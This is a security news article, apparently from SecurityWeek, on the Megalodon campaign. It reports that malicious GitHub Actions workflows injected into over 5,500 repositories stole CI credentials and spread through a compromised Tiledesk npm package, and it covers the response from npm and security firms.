Megalodon Supply Chain Attack Infects Over 5,500 GitHub Repositories
A recent supply chain attack, dubbed Megalodon, has infected over 5,500 GitHub repositories with malware, according to security researchers. The attack relies on automated commits to inject malicious workflows into the repositories.
The campaign uses GitHub Actions workflows containing a payload designed to steal credentials, keys, tokens, and other secrets. The workflows were injected through over 5,700 malicious commits pushed to the impacted repositories within a six-hour window on May 18.
Malicious Payloads and Backdoors
The attackers deployed two payloads as part of the attack. One was designed to add a new workflow that would be triggered on every push and pull request, and another that replaced existing workflows with specific triggers, creating dormant backdoors.
On infected machines, the malware would exfiltrate all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of other types of secrets.
Discovery and Investigation
Megalodon was discovered after malicious versions of the Tiledesk package, an open source live chat and chatbot platform, were identified. The infected packages were published between May 19 and May 21.
According to SafeDep, the same NPM account, eljohnny, published both the clean and compromised versions of the package. The attacker never touched the NPM account, but instead compromised the GitHub repository, and the maintainer published from the poisoned source without realizing it.
The malicious commit that led to the infection was pushed on May 18, authored by ‘build-bot’. SafeDep’s investigation into the associated email address uncovered a total of 2,878 commits made on the same day, along with an additional 2,841 commits made via a second email address.
Attack Vector and Impact
All 5,718 commits landed on the same day, May 18, 2026, across a six-hour window from approximately 11:36 to 17:48 UTC, targeting 5,561 distinct repositories. The attackers’ choice of malicious GitHub Actions workflow, namely ‘workflow_dispatch’, ensured that the dormant backdoor could be triggered at a later date via the GitHub API, using stolen GitHub tokens.
The workflow is exempted from GitHub’s anti-recursion rules, which prevent new workflow runs from being spawned via GitHub token-triggered events. This allowed the attackers to maintain access to the infected repositories even after the initial infection.
Response and Prevention
Last week, NPM announced that all NPM granular access tokens with write access that bypass two-factor authentication have been invalidated to prevent supply chain attacks similar to Mini Shai-Hulud. According to Ox Security, this should prevent account hijacking, but does not resolve the underlying problem, and malicious code will continue to spread through compromised repositories.
Ox Security notes that if platforms continue allowing any type of code to be uploaded without serious vetting, the number of attacks will only increase. The cybersecurity firm warns that we have entered a new supply chain attack era, and the Megalodon attack is just the beginning of an endless wave of cyber attacks on developers worldwide.
- Related: Grafana Says Codebase and Other Data Stolen via TanStack Supply Chain Attack
- Related: Supply Chain Security Crisis: Too Many Vulnerabilities, Too Little Visibility
- Related: Over 320 NPM Packages Hit by Fresh Mini Shai-Hulud Supply Chain Attack
- Related: OpenAI Hit by TanStack Supply Chain Attack
Source: SecurityWeek